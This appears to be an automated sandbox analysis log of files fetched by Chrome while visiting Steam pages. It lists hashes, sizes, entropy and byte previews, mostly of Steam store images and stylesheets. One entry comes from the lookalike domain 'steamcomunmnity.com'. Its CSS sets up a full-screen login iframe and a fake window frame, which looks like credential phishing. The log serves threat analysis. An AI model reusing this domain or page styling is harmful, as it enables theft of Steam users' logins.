        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_ec754287f34c9302b27ff5d57ba83a2ec2e54035.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s............................................?.........................!..1.2AQa."q.3Br......4R.#%5bs...S.................................(......................!.1.."AQ2.aq..............?....R...v.o...g..j...7.>QS.J/:....<....>.....hj.....9ZV.J.e..{....u..JJo}...zC.x.sE...A....../.....O.4<.j..Z.......-{..%.0.....iy6.A.^.#.2..O{K.|...[.vS.H4..x"\.....,u....FO%..v?...K...YU1.^(..d..l>..z.].P.[.l..sXj..DI=.&....qaEM|.&_.../.."4..E".."N..6..I....r&.....[t..)N...j.;.l.....Dm"........c.....wl...?..T....D..........Y..#.....s...H...Z..v..z.X.P:....F)..#ZFu[.5Ur.!.0.J.a..&m..^...3.+......Iy.K'....;aXs,.e9.<O....m.I<@E...eB^._3...{y.........X.e.e..VP....n......#Q.~0.....(i..|..A.b.gq.&*X..H..]z.J.J....u.V.....u.<jL.yg.+..d..F.=5\..p.c&.B....X...xq.q...>...(.=..?i49.0........~3....KI..6|*.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):7013
        Entropy (8bit):7.940014840126126
        Encrypted:false
        SSDEEP:96:oE5jPKRnqGpPF2L/k1jiz12H+ljngIjlOGW9DBnzKopzHGzNd/blx8xsRiJ1/bdL:oKu11hukG4egIpOFOopzQbJRi/dsKr6i
        MD5:A0B18D7B76B3B5D87676E8D007076B65
        SHA1:44256BBF500B7F9E50FF824D6B523ECE38B3CD8F
        SHA-256:4FE182430AE2655125FEAECBD12DA607A2356DCB7C3E8874AC76C7B5BF05EB5D
        SHA-512:B9DDA9E0AE18016C43557686E8B5891A9C293AAC3C8C4FA7E1B716076481489F77F06A26A6DB573E1296D4C77AA6AA3BD9517EA5AE99B94B3581DB44691D0523
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E.................................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?.....1......*..,m.xaI...lLJq.!7.$......{.k.....4......,..k.E......s...['}1.!...r...40d.~.2Z.....w..f.l.F'.....?.3..^..B.il.8..)..M.Kg...a\P..(.8.(.A.R@..a.e..3.....q@.FQ..(.\K.m....E.`..J..o..>.#`.W.P....n!.%..Y.....1...c.........&Gs.%.)5.'...l...h.m.....].#8C..V.n.N..)}.4...'dnY..Xc....I\.gJ..@./.J.GC7"..i.........Qy..(:...I...5$.......54....tr...\V..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 15 x 13, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):291
        Entropy (8bit):6.7719789082293165
        Encrypted:false
        SSDEEP:6:6v/lhPU8WnDspP8GYUQiOTmUDJcyYWm5kvrCBVreLbp:6v/78OaGYfLDBYCrCneL1
        MD5:A2796187C58C7E948159E37D6990ECC2
        SHA1:4209CD85ADD507247F9CE5A87A8C9095B54EE417
        SHA-256:23341256DB7F44B1F3811880FA2BAE6B7748BBF6B62C544A162E38CF0D5C5082
        SHA-512:5EF103B8398507495C2708DF8FCD82BDB763B1D580AAAA6CACFB805614764277C19E8ECE5D890A8AAFC004FC8C25E3AB2E67D6FBF373C432A9A0D7C36FA0890F
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR.............v.4A....tEXtSoftware.Adobe ImageReadyq.e<....IDATx.b...?.......9....]@.......O.G..@...?..:!..H.....T...{.i>..Y.M...ff..W..'.._P>..!..j.......&......4.'...X.@......?.5..m7..E..X.....Eh. ...P...Q ........... ...%.......y...c..@..?i...{.....HteDtom....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
        Category:downloaded
        Size (bytes):404
        Entropy (8bit):7.228296540041501
        Encrypted:false
        SSDEEP:6:6v/lhP1RnDsGgInWSu06zOFn+G1zZ59nkI6fg3yM+sKJcOA0SxVvnkjv8QRcjp:6v/79GTInOkt1zZ59kxfg3J+srNSgHN
        MD5:4B05B817684C262DA91E9B4CFA5631FF
        SHA1:E749387B89A9AEB79C5EB0E52312E35C7CE295F8
        SHA-256:B2709FFCD4928BF069AFB3E5293FE11D33E6470EB6D58965D83E74C05F00573F
        SHA-512:37E24D64B7C1806CC72DC5F3759D51B1E56FA0FEF8726E7EE7F62E85819A1194DE9DB6C5C7436A69C8850FDEA190F2643D418C8A440606AB2BD1166F549334B7
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v5/ico_game_highlight_video.png
        Preview:.PNG........IHDR... ... ............tEXtSoftware.Adobe ImageReadyq.e<...6IDATx.b`..#...........m.3~i...X3..'..|..&.8:.....I6V.......[KS.......o....@ ""laf.....w.... `gg716....~...?.Z.D^......kanF}. {........?....-..........H..8....k.3Q+...`u..UL.:.........g...`..'O..Rj..%K.[.G...<}.l..).n...L....b......T.BF|N.>...SD.g!5>'M.N...`..9.. ..DYp..9....O2.....(.X..`.ywz..45.....IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 176 x 50, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2584
        Entropy (8bit):7.591818812076699
        Encrypted:false
        SSDEEP:48:4wqQNn2xoJ35l3QWpQSufhbTCFV0Q0jkIPIH+UCKPnaqiLruSd+1w:oY2ml31ZCdqWQMkADnK41d+1w
        MD5:86A9CCC0B872F22006A48BC6C2500F4E
        SHA1:0EDCCF2CBC869816135C6FF4C3EEE0C49D0F41C1
        SHA-256:D8BBE461137D50211568449468A1981EF189248200EADD48C3141A9DF0B8F7FC
        SHA-512:43EBD681FE137718E45153B9CE062CE9426AC57D6CE907BD3B1C7709BF6F6D2AB4B49E22F2DC4F203DEDF860A895A4B58F4A01095E97722CE5F27935038F0B56
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/footerLogo_valve_new.png
        Preview:.PNG........IHDR.......2.......Q.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:595356BA543311EAAC5FF1C3D4DCAF18" xmpMM:DocumentID="xmp.did:595356BB543311EAAC5FF1C3D4DCAF18"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:595356B8543311EAAC5FF1C3D4DCAF18" stRef:documentID="xmp.did:595356B9543311EAAC5FF1C3D4DCAF18"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>tU......IDATx..][l.E.....Q(.....11.VTL."....cb.1../.`x.x...&..F}P.....$*........J..5^Z5..@Kc...3...?{f.....%_...f.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (4998)
        Category:downloaded
        Size (bytes):4999
        Entropy (8bit):5.255837022225501
        Encrypted:false
        SSDEEP:96:8jeZ/tn1qS+F1yNHBhGWUPGqY2oXgWiVXlGVBx0nTa:8jeFIVtlWiSd
        MD5:656763E16E0D13D31EB741235FA404A4
        SHA1:2902111869291A1FB5B4DFFF80C7439AABC34E8B
        SHA-256:F61A08003B645326EBFFC19A40FC3F3733EBB99779892EA9FB09CE7A8BC51FE1
        SHA-512:3D284F5E4BCFBBA011DFA6CB7DCED8DB196A3499C2F8F8F6EFFCFDD3272CB7DB5494C00ACE8C4434A1A01DBA29620D75466F10B4673F95455D2441CC87200F2A
        Malicious:false
        Reputation:low
        URL:https://steamcomunmnity.com/assets/9qca2sf5gp/f61a0800b0g5sjdy1se.css
        Preview:@font-face{font-family:Support Assets;src:url(/assets/9qca2sf5gp/fcff4301b0g5sjdy1se.woff2) format("woff2"),url(/assets/9qca2sf5gp/2ddf6979b0g5sjdy1se.woff) format("woff")}body{margin:0;height:100vh;width:100vw;overflow:hidden}#login{height:100%}iframe{outline:0;border:none;position:absolute;top:0;right:0;left:0;bottom:0;width:100vw!important;height:100vh!important}._wn_1vw4v_1{color:#000;background:#dee1e6;box-shadow:1px 1px #353639,-1px -1px #353639;animation:_fadein_1vw4v_1 .1s ease-out}._wn_1vw4v_1{border-radius:1px;overflow:hidden;display:flex;flex-direction:column;font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen,Ubuntu,Cantarell,Fira Sans,Droid Sans,Helvetica Neue,sans-serif;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;font-size:12px;font-size:.74rem}._wn_1vw4v_1>._head_1vw4v_23{display:flex;align-items:center;justify-content:space-between;position:relative}._wn_1vw4v_1>._head_1vw4v_23>._title_1vw4v_30{padding:6px 4px;display:flex;align-
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, baseline, precision 8, 184x69, components 3
        Category:dropped
        Size (bytes):5587
        Entropy (8bit):7.91930589678469
        Encrypted:false
        SSDEEP:96:B5s3nxuQoC0355pYTVXmWka/kml4rYB3GAau1ma/YjkztIAanlPG6d4yMQlb:BNQo/3pYToWJGrYJUu11/8kNanYo4bQ5
        MD5:CECEDE0A8C154D0A476EB4AAD54AB65E
        SHA1:B4743F421C5D97EEEEE0C1F19E4EADC4B90693CC
        SHA-256:6B872A1F8C735897E38D6562147480D218E55F1C41F6E939E0EEF0E939170B8B
        SHA-512:914C3381F26780B04DA024411A2BCC6E07181B9CD04B8DBDA6D9F77544C7C6286363B1FDF2DA16070F2F303D9CB2F57A52EF4EFDF12CF500316B6A3112965D24
        Malicious:false
        Reputation:low
        Preview:......JFIF.............C....................................................................C.......................................................................E..............................................>.........................!...1A."Qaq...2...BR..#..3b.Scr...................................'......................!.1.AQ.2Ba"................?....|5bD..i...\...3D\.....*.rs...P,.J.0........Sv.....=:B..t\......+ #*...lV..D..ia...b..iS.....)..T9>.#.-....E.$~.IC.`"@...>~GC..(Eu>@yd..F.7..../..C.&.......x... .....Q...?.u........4Q.".@....9..H.H.....TD.&..2. .....].\g^}.FJ....F.U...t.E..y..`.(?...B..0...L..H"9;NNG.X..|..~Z&..z......L....+. ...:.....%eC....@.4.H......cB....A[..!.....!....h.........rOa..k??......E.}....B.Tv.~...#...MtB......*y.....ZT9.[..T.h.@.N...\Cf...c..tq5....>A]d..(..{....`...x...N^..#l.Z;...@3.:.5~1.. 2N.|...E:.....of...,..M...Od...<}.$...9...."!a.`=..oc...o....Q.w...G:SKV)j.......)...r)......t..H..c].J.._q..U.......)....P.t..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:ASCII text, with very long lines (361), with CRLF, LF line terminators
        Category:downloaded
        Size (bytes):57258
        Entropy (8bit):5.243366680566906
        Encrypted:false
        SSDEEP:768:kHHithZY2ucy8vQfVYvArYRaeNBJk0XHBkwQ+JOJSk3acbAHEvaSlEP04rn/xENj:of8JXNrhBcRTUEFwiKYfBn
        MD5:3D42397BCB312EC07D70AE0D68FBADDE
        SHA1:3AF248D34E6A31B3D3269C65505458D42372EF0B
        SHA-256:53961D66B24EF8CC16B6CB5CB249CDF311AA89B6AFC70F06A242FCCC3A4EFCD3
        SHA-512:F4C325A231B11CE6A3E2899367E081CD6AC2E7AC1469542414BA0E3B57DF5897DF51615E2AD0AB6559E6B38003FFDBFA533C6E5701D0BC2F40FAE80EB4332348
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/css/v6/cart.css?v=PUI5e8sxLsB9&l=english
        Preview:/* CSS Document */....body.v6 {....font-family: "Motiva Sans", Sans-serif;....font-weight: normal; /* normal */......}.....tooltip_q_ctn {.. background: rgba(255,255,255,0.4);.. color: white;.. border-radius: 10px;.. font-size: 11px;.. padding: 1px 5px 2px 5px;.. cursor: default;..}...tooltip_q_ctn:hover {.. background: rgba(255,255,255,0.5);..}....body.v6.checkout .page_header_ctn {...padding-bottom: 47px;...margin-bottom: -50px;..}....body.v6.checkout_microtxn .page_header_ctn {...padding-bottom: 47px;...margin-bottom: -10px;..}....body.v6.cart_page h4 {.....font-family: "Motiva Sans", Sans-serif;....font-weight: normal; /* normal */.......font-weight: normal;...color: #c7d5e0;..}....body.v6.login .rightcol h2 {...margin-top: 0px;..}..body.v6.login .rightcol .spotlight_block {...margin-bottom: 25px;..}....#checkout_review_cart_area {...margin-top: 56px;..}....#payment_info_tab .checkout_content .payment_info_form_area {...background: rgba( 0, 0, 0, 0.2 );...paddi
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):557
        Entropy (8bit):7.26363709527695
        Encrypted:false
        SSDEEP:12:6v/7O3V4jeTtXfQz+xZmrZXU0SJ433XS0OUnUVi6MMlZZL/PBT:LyyhIz+CrZE0U43HVFUlZXZLnR
        MD5:79364EFAF8D8571D7DD76BAC8226FE61
        SHA1:113924AE62716D89E127B7EE712E16E7BD945B03
        SHA-256:6D916C5D94DD9668A1D04BF51D9013604B754A295677AFE7037BDBC6E8636F60
        SHA-512:C13C5012BBD13D7CBE7EA27FAB908F852C64EE1B960F2053ADBF461729913C8BC5682783894D162F5F52713040F16D350966E29F097335F2CCAD6D5F0A97D536
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR...@...@......iq.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..=K.P..s.....M)"..... .........A..A....8...M..Z..D...p...6$...^.4I...Q.(...m*.........,....*...!.rR,eP_..H.....4..G.$.b^..uH.$H....f*v.].o.....t..1.k...H.....,..]....!|lY..'..T.9..\A{p..1....|....O...2.....>..........4............u.9...OH%....`..}..C.N..C.7.t...p.$.. ..$........./......@.-.{....H.n.:p..;J"zPj[.-...4...<...?.......\\t.X5........e}.+...\..[..i.....I.Tl........................%.......!.........T...8.g. |s.I.....<.o...g}..........IEND.B`.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 20 x 20, 8-bit/color RGBA, non-interlaced
        Category:downloaded
        Size (bytes):2849
        Entropy (8bit):7.864889439878249
        Encrypted:false
        SSDEEP:48:V/6DocieftI9G9f6A+FIDOWu0lDl+gm7QyTtctIInQSy6IVpqlnBcODR:VSDZ/I09Da01l+gmkyTt6Hk8nTR
        MD5:DC8F5B05CEA9BCD58BF22F88D54C9B42
        SHA1:A1C91EAF895E066D1A1EDD60E039FF8A44A31FB6
        SHA-256:5B30184DFE00661434D5420500133935A0188E2BB2AB079DDCFF496166C98107
        SHA-512:977032565A56B13AA576AF7EFA8D53099AE5383D59619B5D31C09392C896E98D1CF15B1627BD83EB849957C4D55518B8A7BBF3D2FF14EDF177874FEB84E20824
        Malicious:false
        Reputation:low
        URL:https://store.cloudflare.steamstatic.com/public/images/v6/icon_platform_win.png?v=3
        Preview:.PNG........IHDR.....................pHYs................OiCCPPhotoshop ICC profile..x.SgTS..=...BK...KoR.. RB....&*!..J.!...Q..EE..........Q,......!.........{.k.......>........H3Q5...B..........@..$p....d!s.#...~<<+".....x.....M..0.....B.\.....t.8K....@z.B..@F....&S....`.cb..P-.`'........{..[.!..... .e.D.h;...V.E.X0..fK.9..-.0IWfH.............0Q..)..{.`.##x.....F.W<.+...*..x..<.$9E.[.-q.WW..(.I.+.6a.a.@..y..2.4..............x.....6..._-..."bb....p@...t~..,/...;..m..%..h^..u..f..@.....W.p.~<<E.........J.B[a.W}.g._.W.l.~<.....$.2].G......L.....b..G.......".Ib.X*..Q.q.D...2.".B.).%..d..,..>.5..j>.{.-.]c..K'.Xt......o..(...h...w..?.G.%..fI.q..^D$.T.?....D..*.A....,.........`6.B$..B.B.d..r`)..B(...*`/.@.4.Qh..p...U..=p..a...(....A...a!..b.X#......!.H...$ ..Q"K.5H1R.T UH..=r.9.\F..;..2....G1...Q=...C..7..F...dt1......r..=.6...h..>C.0....3.l0...B.8,..c."......V.....c.w...E..6.wB a.AHXLXN.H. .$4...7...Q.'"..K.&.....b21.XH,#..../.{.C.7$..C2'...I..T...F.nR#.,..4H.#...dk..9.,
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 1920x622, components 3
        Category:downloaded
        Size (bytes):271346
        Entropy (8bit):7.979118969870086
        Encrypted:false
        SSDEEP:6144:N2+33YecJMlNk7q8i7su1PMFUQJFpTqhnCnbNJ:c+33DDke8xm0FNFJSnCbL
        MD5:C80E2E3AC1EDBEBD75D76CE80E16A40B
        SHA1:114D18FB05D57794EE53C6D1E042E2D207B06423
        SHA-256:F3EE59FD0368874858B582273D4F62679B84C1350A8BFF56A1FB2362007B49C5
        SHA-512:347035291B156AD6CE211CC271348E1B9005C3A55D65FD0A04B2077800488DAD630641671B533C2436B668B0FC09CB3FAA0091B27CD5EFEDA08D203BF2900D56
        Malicious:false
        Reputation:low
        URL:https://clan.akamai.steamstatic.com/images/39049601/114d18fb05d57794ee53c6d1e042e2d207b06423.jpg
        Preview:......JFIF.............C........................................................ "..".......C.......................................................................n.............................................L.........................!1A.."Q2aq..#B.R.....3.$Cbr.S.....4..%c.5Ds.T.d..................................<........................".2!1BR.#AQa.3qb..C..$r...S...4c..............?..;N!*.%X.9....h...&...-....f@t.m.x.!....'.S....H..?2M....\.O....%.............j6r.U#...G<....|*0s..:.....X:..dQ*c!=..P..GI.lJ..iF.}j%.(5./}.`1..W=v....^.9.t3....dm.`.....t.C.O.@.Zk....w....5...H...!...'.X....;...........J.y..s.............:.[.7..k.@?..*.S...*..S@...P...r.=@.E..@.@.......h...Hf.T...#...t.z....Jj.|....<..O...h.t.s...P.....H..7km.;B....MU..h....N....c!.q)..3H..@=..UX'21..........6...%..2..._.&}...9'$.5A.(,p+L.......U..J.wP..P.sL)....I#-....1.v ....NX..q..j..L.../.UT'2....(..VL.......Q.=....#JrMLr4....(.......a.........sS..d.#....t...X..2\8...\S}.t.j....V..zc..
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], progressive, precision 8, 312x205, components 3
        Category:downloaded
        Size (bytes):11100
        Entropy (8bit):7.89198577869451
        Encrypted:false
        SSDEEP:192:J7SAva1ogiBNXXLpMwHn9+GI7LXweaqOmqB9SskTz8SEIW07UvkL:J7F+1ivXdMwdYraZSskUSEimA
        MD5:F4F0B6326C2003EB4402B54C58F94EEA
        SHA1:DB85DADC5D6AF60916109C7A0CBE271E136499AD
        SHA-256:7C5E12F86A8D057BF3CA1E838261E461363078FA52B23628D0D628106D87E5AF
        SHA-512:3FD46E921029E1902DA3F61C81267738A34A9066677BA8963A57D29ADD2D64D0D584DF27DACB9D118227989473BEC5ADB992EF20F4836D45A680A8F29C73DB15
        Malicious:false
        Reputation:low
        URL:https://store.akamai.steamstatic.com/public/images/v6/home/background_spotlight.jpg
        Preview:......Exif..II*.................Ducky.......Z.....+http://ns.adobe.com/xap/1.0/.<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:087FE64A8C0311E6AFFD9C9877AAAA54" xmpMM:DocumentID="xmp.did:087FE64B8C0311E6AFFD9C9877AAAA54"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:087FE6488C0311E6AFFD9C9877AAAA54" stRef:documentID="xmp.did:087FE6498C0311E6AFFD9C9877AAAA54"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>...&Adobe.d....................;...n..+Z....................................................................................................
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 115x65, components 3
        Category:downloaded
        Size (bytes):4025
        Entropy (8bit):7.875305304007276
        Encrypted:false
        SSDEEP:96:vWse8fHEpBjJ0qfgezoPs1VxAVSCrpTpr72lNur+qrG:O7SWBje8xM01VKVddp7Eq6
        MD5:23E3FA5AB0EC8BD2017FD6D352613C79
        SHA1:1611C7716920D4E1028C1F4929C8638A28578630
        SHA-256:6FDE6A537942144EA9FF42770241E8904CF978AC14608A56181897A91D5094A2
        SHA-512:B205015B2EF9806475D6A26B10138768BFCBDC7A849698265C8B02F7A50966A90B24789C7EF1021DA8AC9812FB28FD7CE118BA329F775D3E037B398E81C36FA0
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/1643320/ss_56c87fa0b43911c95e91ea86aebffdf7e35bb701.116x65.jpg?t=1705420866
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................A.s...........................................E..........................!.1Q."Aaq..2rs....#34BR........5$67Cbtu................................-.....................!..1A."2Q.aq..B.................?..D.rM.R.J..k&,.iZ.'pz.q....;..dN.d[../...t(.+...aqn@x..:/..s|.....B.-..1..%N.AD.`z...V.)..'<...Fg...]R...P*i..'P.V .0...:.J....R;._..8..H...a$.WO).......2....^f..JNi....r..v....a.gN....{...#.*........w./.....*._..>.......".S...K..R........0n].r...d....+:..._.w..A.[......V#.j..k...R.:..!#..w...L..$....u9..h-....H..Q7;s;..LU".%:*f>..........T....7...6.....a.......R..u.KQH*V.....I..j.C....7.!.p6...C.U6g4..(C.JIk.$............IYJ...e..2. Y.W:.3.Y....8e..g........$#..E.....#.=..y|6..r...gj.z3..q..........O..U..=.o,[]....t._f...v.. .m......M......{.1v.5I.h_..t..MD.....6.......z.mo,c..(..d>.S..k ....Mqr
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 184x103, components 3
        Category:downloaded
        Size (bytes):7188
        Entropy (8bit):7.928137211818788
        Encrypted:false
        SSDEEP:96:2NDAhc38+whap12KImaeDzUshh6g2a01DEb2+EtlXlqMtz0JM1jSjSh4JrNRGB1u:2iO8+wc3h3HDzUsztSMMtlALS4JWmlGK
        MD5:F957DF6EDCDA7BA4BAB69BB411034539
        SHA1:6D78BFDD85C379441A047E64B3AADC6D79E52064
        SHA-256:7D7877327F8EE705E15AC9DDC24CE00D62DF0CA1AD268908D654D30BF505F17A
        SHA-512:DF485EDAFC0C577237F8B1CD0AA6F72732D9E703390F2244E0C143675DD02A5405F1A1D31DAD61AB17379F3A1106FE22A828DB7B0FA73E67DB68E1CA57A3DA78
        Malicious:false
        Reputation:low
        URL:https://cdn.cloudflare.steamstatic.com/steam/apps/256994352/movie.184x123.jpg?t=1705420844
        Preview:......JFIF.....H.H.....C....................................................................C.......................................................................g..............................................I..........................!..1A"Qa..q#25....$s.......%BSr....3Rc4Cb...................................1.......................!1.A.Qa.."2...bq#...3..............?...m.[..B...e....c.B.G.........Q..o..g.........,......V..d...8.J?.&.i.1.......\V3.!,qd.f.........Y.#..&..A.....y./.r....~..Jn........'....L~........-.o...'..?.............}>..........9...~Z......=.Xw.>.^S. .6.Q..'.......=..JSn.jA?....9......-....+......w.q.,.~_..T0Ay.r.C..t...\r9I...Q...u|..y......H.uQ...&x.....vQ..q..K....C...t.....S..7..... ....d.OD....C....Pl.^...Q.P..\...R"?N}.Yu..Z...B.v.<..0.=......t#0.G...ld%...P.{c]..E.y...IO.B.....p5.:......=.P^....lq_..bI>.}1.a..&.(....O...1h.....r.Y6.H.\.Y2L../H.....h.nu...S'..T=p....U.....*....&.2..*M.".D../lw.[/.z.......:.>)..M.q#..H.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:data
        Category:downloaded
        Size (bytes):330233
        Entropy (8bit):7.998577680714058
        Encrypted:true
        SSDEEP:6144:8Iztzz8IbyBUliGWPtfHkO5oDhsQzsjrgIZiNljTgoMKgJ:Bt8IeLfHkO5S8jEIkNVTg3VJ
        MD5:9EECE7B9FDFC52C7F11F1825DAF48024
        SHA1:BCAA1C77E2265860142BF98DF8702EE5E7330B42
        SHA-256:65A48E412F9811094E68C6DB2977FFCEC7E1BEA655D483AB9626122850A46BBB
        SHA-512:AA3EAB8D86918E60BEC96D891D0D9B5E355CA1F93D825D52DFBA8FA14894FE6A16ABF8CF06A4EE6AFD7EEA413B77B10B4EE5FBBA54CD5C07D94935291526A1FF
        Malicious:false
        Reputation:low
        URL:https://shared.akamai.steamstatic.com/store_item_assets/steam/clusters/frontpage/eb193c51e2c473096f72216e/webm_page_bg_english.webm?t=1716506545:2f77e586e7d3b8:2
        Preview:"..l..d.&.Z.m.m2-.ALW.56.t.SQyp....Y.......7d<...Z...<........'.%..8...)...V../........5w...n..4.`.Iu@PE.9..q..E...+.....8.....9.}.T.U-.l.....\'pG........tR.);.w ...K..*b..E..;....L...+.k.....liI....J}....U..i..=od.p.e.!...J.C..&.U.....;`.......t.o$.... v.P...,...$.-...q]...5.$Kl;.....\J......!..a|;._.l....\N.2.{.K..k..~.x.....<Ivpys..z."..i.7...=...|(..........$(.......1....+.&~..8._....|....c.........O.......^.#... k9...}.....Us..<J..A..cs;..".MP. .x..R..W...hD.69W...OZ......f.u.....C..:bqSP..Xg.Y.{..0..@h@6v.e...5E.......S$......!oB..h...J...6."..c.Q...."....NT'.....*....O.Ir..|%C.?.jY..T.k..........o...,..ce..|.....e....i.f..A.....&...]...........Q.f1...I#,(b..................(.....C../.....Rb$....._Z{*..&}.....^.....%Qm..y..Z...r.M...s...!\....1..cR..J.z.;.gw.#.VP......E].....U@x.k3.k ........f............s.Vy..#..r..n_.<...*.n.v..iyY.6.U.Ir..H.7v.Q^..Jq...?.<..v&.{o...A..'.;..F.K..)?.H.V.b..$....X...:....m.........:.-...}.;.L...#.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
        Category:dropped
        Size (bytes):1248
        Entropy (8bit):6.644085540417408
        Encrypted:false
        SSDEEP:24:Gy1he91Wwjx82lY2T3ouVUzmyJ3V1VPGtvAG0HgD2qSAUhR/:GwqQNn2xiZJ35PlGoZ/
        MD5:E0CC340704548A0DF17F0AEA0B12C375
        SHA1:740427827904263BD2F1C27E45759F47139D4214
        SHA-256:E60E217F0E2E2866D3FB9D22AC36E37C45BB60504D8C86E40B0E7DAA0B329286
        SHA-512:0E0A0A4D85149C1FA309E54475E713945E07735E9BE59176E4DE8A0BA89987DB51B00F04E8A906E97210CCE0E0FB1B5C0921856F5C52C30890AE765DA1AFACA1
        Malicious:false
        Reputation:low
        Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<..."iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.3-c011 66.145661, 2012/02/06-14:56:27 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmp:CreatorTool="Adobe Photoshop CS6 (Windows)" xmpMM:InstanceID="xmp.iid:E47CA524C36111E7A7B2FDEF91BAF72A" xmpMM:DocumentID="xmp.did:E47CA525C36111E7A7B2FDEF91BAF72A"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:E47CA522C36111E7A7B2FDEF91BAF72A" stRef:documentID="xmp.did:E47CA523C36111E7A7B2FDEF91BAF72A"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>..K...TIDATx.b...?.@.&......p....FFF..`...Rb@....P..I...sA......G ..._..+..?...%...@......>x.5.....t....(.....`..@,J.
        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
        File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 292x136, components 3
        Category:dropped
        Size (bytes):17833
        Entropy (8bit):7.962302476292767
        Encrypted:false
        SSDEEP:384:Im0QBETqaAhl+oW98EUFpAWRDLscFeVBg3YyXjmigdlxSchkz:Im0QeTqwL9UFPRDLjFeVBKYyCignxlE
        MD5:6A85743E03257D77A48C33CD8BD9F84F
        SHA1:9D3B0CF721F08C96CCE0B34347296D928807E4A0
